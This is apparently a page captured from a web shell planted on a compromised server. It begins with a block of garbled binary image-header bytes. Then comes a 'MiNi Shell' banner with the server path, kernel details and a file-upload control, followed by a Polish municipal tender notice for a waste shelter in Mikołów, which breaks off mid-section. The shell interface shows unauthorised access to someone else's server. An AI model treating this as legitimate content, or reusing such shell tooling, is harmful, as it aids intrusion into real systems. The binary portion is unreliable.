JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211028/0024874001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa wiaty śmietnikowej przy ul. Szafranka w Mikołowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Gospodarki Lokalowej w Mikołowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 270547060</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mikołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-190</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@zgl.mikolow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgl.mikolow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa wiaty śmietnikowej przy ul. Szafranka w Mikołowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6b2c0598-37b8-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00248740</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000018/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Budowa wiaty śmietnikowej przy ul. Szafranka w Mikołowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/zgl_mikolow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zgl_mikolow</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Szczegółowy opis wymagań znajduje się w SWZ w Dziale XI1. Komunikacja w<br/>postępowaniuoudzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie<br/>do udziałuwpostępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów<br/>luboświadczeńmiędzy zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w<br/>ustawiep.z.p.,odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki<br/>komunikacjielektronicznejrozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia<br/>18 lipca2002 r. oświadczeniu usług drogą elektroniczną (Dz. U. z 2020 r. poz. 344). 2. Ofertę,<br/>oświadczenia, októrychmowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązaniepodmiotuudostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie<br/>dostępnychformatachdanych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a<br/>takżeoświadczenie ojakim mowa w Rozdziale IX ust. 1 SWZ składa się, pod rygorem nieważności, w<br/>formieelektronicznejopatrzonej elektronicznym kwalifikowanym podpisem lub w postaci<br/>elektronicznejopatrzonej podpisemzaufanym lub podpisem osobistym. 3. Postępowanie prowadzone<br/>jest w językupolskim, w formieelektronicznej, za pośrednictwem platformazakupowa.pl<br/>podadresem:https://platformazakupowa.pl/pn/zgl_mikolow4. Zamawiający, zgodnie z § 3 ust.<br/>3RozporządzeniaPrezesa Rady Ministrów w sprawie użycia środków komunikacji elektronicznej<br/>wpostępowaniu oudzielenie zamówienia publicznego oraz udostępnienia i przechowywania<br/>dokumentówelektronicznych(Dz. U. z 2017 r. poz. 1320; dalej: “Rozporządzenie w sprawie środków<br/>komunikacji”),określaniezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformazakupowa.pl,tj.:a.stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej<br/>niż 512 kb/s,b.komputerklasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram,procesor<br/>Intel IV 2GHZ lub jegonowsza wersja, jeden z systemów operacyjnych - MS Windows 7, MacOs x 10<br/>4, Linux,lub ichnowsze wersje,c. zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku InternetExplorerminimalnie wersja 10 0.,d. włączona obsługa JavaScript,e. zainstalowany<br/>program AdobeAcrobatReader lub inny obsługujący format plików .pdf,f. Platformazakupowa.pl działa według standarduprzyjętego w komunikacji sieciowej - kodowanie UTF8,g. Oznaczenie czasu odbioru<br/>danychprzezplatformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg.<br/>czasulokalnegoserwera synchronizowanego z zegarem Głównego Urzędu Miar.5. Wykonawca,<br/>przystępującdo niniejszego postępowania o udzielenie zamówienia publicznego:a) akceptuje warunki<br/>korzystaniazplatformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej<br/>pod linkiemwzakładce „Regulamin&#34; oraz uznaje go za wiążący, zapoznał i stosuje się do<br/>Instrukcjiskładaniaofert/wniosków dostępnej pod linkiem. 6. Zamawiający nie ponosi odpowiedzialności<br/>zazłożenie ofertyw sposób niezgodny z Instrukcją korzystania z platformazakupowa.pl, w<br/>szczególnościza sytuację, gdyzamawiający zapozna się z treścią oferty przed upływem terminu<br/>składania ofert (np.złożenie oferty wzakładce „Wyślij wiadomość do zamawiającego”). Taka oferta<br/>zostanie uznana przezZamawiającegoza ofertę handlową i nie będzie brana pod uwagę w<br/>przedmiotowym postępowaniuponieważ nie zostałspełniony obowiązek narzucony w art. 221 Ustawy<br/>Prawo ZamówieńPublicznych.7. Zamawiającyinformuje, że instrukcje korzystania z<br/>platformazakupowa.pl dotyczące wszczególności logowania,składania wniosków o wyjaśnienie treści<br/>SWZ, składania ofert oraz innychczynności podejmowanychw niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują sięw zakładce „Instrukcje dlaWykonawców&#34; na stronie internetowej pod adresem:https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1) Zgodnie z art. 13 ust. 1 i 2<br/>rozporządzeniaParlamentuEuropejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie<br/>ochrony osóbfizycznych wzwiązku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takichdanych orazuchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie<br/>danych) (Dz. Urz. UE L119 z04.05.2016, str. 1), dalej „RODO”, informuję, że:• administratorem<br/>Pani/Pana danych osobowychjestZakład Gospodarki Lokalowej z siedzibą w Mikołowie, przy ul.<br/>Kolejowej 2;• w sprawachzwiązanych zPani/Pana danymi proszę kontaktować się z Inspektorem<br/>Ochrony Danych, kontaktpisemny zapomocą poczty tradycyjnej na adres 43-190 Mikołów, ul. Kolejowej<br/>2 , pocztą elektronicznąna adres email:ido@zgl.mikolow.eu;• Pani/Pana dane osobowe przetwarzane<br/>będą na podstawie art. 6ust. 1 lit.c RODO w celu pro- wadzenia przedmiotowego postępowania o<br/>udzielenie zamówieniapublicznegooraz zawarcia umowy, a podstawą prawną ich przetwarzania jest<br/>obowiązek prawnystosowaniasformalizowanych procedur udzielania zamówień publicznych<br/>spoczywający naZamawiającym;•odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty,<br/>którymudostępniona zostaniedokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy<br/>Pzp;•Pani/Pana dane osobowebędą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>4 latod dnia zakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4lata, okresprzechowywania obejmuje cały czas trwania umowy;• obowiązek podania przez<br/>Panią/Panadanychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonymwprzepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie<br/>zamówieniapublicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp;• w<br/>odniesieniu doPani/Panadanych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowaniedo art. 22RODO;• Posiada Pan/Pani:- na podstawie art. 15 RODO<br/>prawo dostępu do danychosobowychPani/Pana dotyczących;- na podstawie art. 16 RODO prawo do<br/>sprostowania lubuzupełnieniaPani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lubuzupełnienia niemoże skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznegoani zmianąpostanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszaćintegralnościprotokołu oraz jego załączników.- na podstawie art. 18 RODO prawo<br/>żądania odadministratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,<br/>o którychmowa w art. 18ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma<br/>zastosowania wodniesieniu doprzechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesupublicznego UniiEuropejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania<br/>danychosobowych doczasu zakończenia postępowania o udzielenie zamówienia.- prawo do wniesienia<br/>skargido PrezesaUrzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że- przetwarzanie<br/>danychosobowych Pani/Pana dotyczących narusza przepisy RODO;• nie przysługuje Pani/Panu:- w<br/>związku zart. 17 ust.3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do<br/>przenoszeniadanychosobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo<br/>sprzeciwu,wobecprzetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Panadanychosobowych jest art. 6 ust. 1 lit. c RODO.2) Jednocześnie Zamawiający przypomina o<br/>ciążącymnaPani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób<br/>fizycznych,którychdane przekazane zostaną Zamawiającemu w związku z prowadzonym<br/>postępowaniem iktóreZamawiający pośrednio pozyska od wykonawcy biorącego udział w<br/>postępowaniu, chyba żemazastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust.5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGL/TP/14/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest zgłoszenie wykonania robót, budowa wiaty śmietnikowej 6,55x4,4 wraz z przebudową nawierzchni z kostki brukowej betonowej przy ul. Szafranka w Mikołowie (działki: 238/55)<br/>2.	Zakres robot obejmuje:<br/>a)	sporządzenie dokumentacji potrzebnej do zgłoszenia wykonania robót do właściwego organu administracji<br/>b)	budowę wiaty śmietnikowej o maksymalnych wymiarach 6,55 x 4,4 m.<br/>- wiata o konstrukcji stalowej, konstrukcja ocynkowana i malowana<br/>- poszycie ścian i dachu – blacha trapezowa powlekana w kolorze szarym.<br/>c)	Wiata wyposażona w trzy furtki, i trzy boksy:<br/>- boks na odpady zmieszane gdzie przewiduje się: 2 pojemniki o pojemności 1000 l, 2 pojemniki o pojemności 240 l<br/>- boks na odpady segregowane gdzie przewiduje się: 1 pojemnik o pojemności 1000l, 9 pojemników o pojemności 240l, 2 pojemniki o pojemności 120l<br/>- boks na odpady wielkogabarytowe<br/>d)	Podłoże w wiacie stanowić będzie w części istniejąca nawierzchnia z kostki brukowej betonowej i nawierzchnia nowa (pas o szerokości 1 m) z kostki brukowej betonowej.<br/>3.	Szczegółowy opis przedmiotu zamówienia zawarty jest w przedmiarze robót, który pełni rolę pomocniczą oraz specyfikacji technicznej wykonania i odbioru robót, które stanowią załączniki nr 6 do SWZ. <br/>4.	Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, patenty lub pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, dopuszcza się zaoferowanie rozwiązań równoważnych opisanym, pod warunkiem zachowania przez nie takich samych minimalnych parametrów technicznych, jakościowych oraz funkcjonalnych itp. <br/>5.	Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone przez Zamawiającego. W takim przypadku, wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z jego opisem lub normami. <br/>6.	W przypadku, gdy w opisie przedmiotu zamówienia znajdą się odniesienia do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym. <br/>7.	Wszelkie materiały używane do wykonywania prac winny posiadać stosowne wymagane obowiązującymi przepisami prawa atesty, aprobaty i dopuszczenia do stosowania w budownictwie. Dokumenty potwierdzające powyższe Wykonawca przedstawi każdorazowo na żądanie inspektora nadzoru.<br/>8. Wykonawca w czasie realizacji prac będzie utrzymywał ład i porządek na terenie , na którym je wykonuje, a także zapewni warunki bezpieczeństwa i p.poż. Określone w przepisach szczególnych.<br/>9.	Zamawiający informuje również, iż przyszłemu Wykonawcy nakazuje się zabezpieczyć plac budowy przed dostępem osób trzecich, utrzymywać ład i porządek w trakcie robót, oraz uporządkować po ukończeniu robót.<br/>10.	Na wykonane przez siebie prace oraz zastosowane materiały Wykonawca musi udzielić minimum 3 letniej gwarancji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się<br/>kierował następującymi kryteriami oceny ofert:<br/>Łączna cena oferty brutto – 60 pkt. = 60%<br/>Okres gwarancji – 40 pkt. = 40%<br/>1.1 Przy ocenie kryterium „Cena” zostanie wykorzystany wzór:<br/>C=Cena najniższa z ważnych ofert /Cena badanej oferty x 60 pkt<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Cena” wynosi 60 pkt.<br/>1.2 Ocena kryterium „okres gwarancji”– 40 pkt<br/>Punkty zostaną przyznane w następujący sposób:<br/>za min. 3 letni okres gwarancji na wykonane prace i zastosowane materiały uzyskuje 0 pkt.<br/>za 4 letni okres gwarancji na wykonane prace i zastosowane materiały uzyskuje 20pkt<br/>za 5 letni i dłuższy okres gwarancji na wykonane prace i zastosowane materiały uzyskuje 40 pkt<br/>(okres gwarancji należy podać w pełnych latach) W przypadku, gdy Wykonawca w Formularzu Ofertowym poda okres gwarancji krótszy niż 3 lata Zamawiający uzna, że Wykonawca nie udzieli minimalnego wymaganego okresu gwarancji na wykonane prace i zastosowane materiały będące przedmiotem zamówienia i odrzuci ofertę Wykonawcy jako niezgodną z zapisami SWZ.<br/><br/>W przypadku, gdy Wykonawca w Formularzu Ofertowym nie wpisze okresu gwarancji Zamawiający przyjmie, jako podstawę do oceny, minimalny okres gwarancji na wykonane prace i zastosowane materiały będące przedmiotem zamówienia, a oferta otrzyma w tym kryterium „0” punktów.<br/><br/>W tym kryterium można uzyskać maksymalnie 40 punktów, nawet jeśli wykonawca poda dłuższy okres gwarancji niż 5 lat.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności technicznej lub zawodowej:<br/>Niniejszy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że:<br/>1.1) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie:<br/>a) co najmniej 1 robotę budowlaną polegającą na budowie wiaty o wartości 20 000,00 zł brutto <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>2.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty - załącznik nr 5 do SWZ;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga 